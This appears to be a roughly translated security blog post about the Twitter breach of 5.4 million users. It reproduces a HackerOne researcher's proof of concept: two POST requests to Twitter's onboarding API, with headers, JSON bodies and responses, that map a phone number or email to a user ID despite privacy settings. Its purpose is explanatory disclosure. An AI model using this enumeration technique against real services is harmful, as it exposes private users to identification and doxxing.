Twitter Data Breach

shape
shape
shape
shape
shape
shape
shape
shape

Twitter faces data leaks After an attacker advertises the sale of information containing a phone number. and email addresses of more than 5.4 million users. This information was posted to the Darkweb for $30,000 USD.

The vulnerability was discovered by HackerOne user “zhirinovskiy” and has been reporting the vulnerability to Twitter since January 1st, and five days after the vulnerability was posted. Twitter has fixed the vulnerability and awarded Bugbounty to zhirinovskiy $5,040.

Technical way of attack

As for the attack method A vulnerability has been exploited that allows an attacker to locate a Twitter account by phone number or email, even if the user has disabled this function in the Privacy option. Only with the Android client of Twitter.

which zhirinovskiy told about the procedure And how to attack by testing, see as follows.

Before starting the experiment, perform Disable discoverability. To set up a Twitter account first

1. In the first step, create a Login Flow by sending a POST request to https://api.twitter[.]com/1.1/onboarding/task.json?flow_name=login in the Header section, use the same value in every request.

User-Agent: ████ (████)
Accept-Encoding: gzip, deflate
Authorization: Bearer ███████
X-Guest-Token: █████ #This value changes dyna. Mick and must be generated from time to time.
Accept: application/json
X-Twitter-Client: TwitterAndroid
System-User-Agent: ██████
Content-Encoding: application/json
Content-Type: application/json
Accept-Language: en-US

Body:
{“flow_token”:null,”input_flow_data”:{“country_code”:null,”flow_context”:{“start_location”:{“location”:”deeplink”}},”requested_variant”:null,”target_user_id”: 0}}

Response:
{“flow_token”:”██████”,”status”:”success”,”subtasks”:[{“subtask_id”:”LoginEnterUserIdentifier”,”enter_text”:{“primary_text”:{“text “:”To get started, first enter your phone, email, or @username”,”entities”:[]},”hint_text”:”Phone, email, or username”,”multiline”:false,”auto_capitalization_type”: “none”,”auto_correction_enabled”:false,
“os_content_type”:”username”,”keyboard_type”:”text”,”next_link”:{“link_type”:”task”,”link_id”:”next_link”,”label”:”Next”},”skip_link”: {“link_type”:”subtask”,”link_id”:”forget_password”,”label”:”Forgot password?”,”subtask_id”:”RedirectToPasswordReset”}},”subtask_back_navigation”:”cancel_flow”},{“subtask_id” :”RedirectToPasswordReset”,”open_link”:{“link”:{“link_type”:”deep_link_and_abort”,”link_id”:”password_reset_deep_link”,”url”:”twitter://onboarding/task?flow_name=password_reset&input_flow_data=%7B%22requested_variant%22%3A%███%22%7D”}}}]}

You will see that after completing this step, you will receive the Flow Token as highlighted first, which will be used for the next request.

2. Send a POST request to https://api.twitter[.]com/1.1/onboarding/task.json with the same Header and Flow Token received from the previous response.

Body:
{“flow_token”:”██████”,”subtask_inputs”:[{“enter_text”: {“suggestion_id”:null, “text”: “█████████”, ” link”: “next_link”},”subtask_id”: “LoginEnterUserIdentifier”}]}

Response:
{“flow_token”:”████”,”status”:”success”,”subtasks”:[{“subtask_id”:”AccountDuplicationCheck”,”check_logged_in_account”:{“true_link”:{“link_type”: “task”,”link_id”:”AccountDuplicationCheck_true”},”false_link”:{“link_type”:”task”,”link_id”:”AccountDuplicationCheck_false”},”user_id”:”███”}}]}
as See, we get a User_id (second highlight) which can be used to get all the Twitter account’s information, even with Disable discoverability. To set up a Twitter account in the pre-test step.

Remediation

Change your Twitter account Credentials.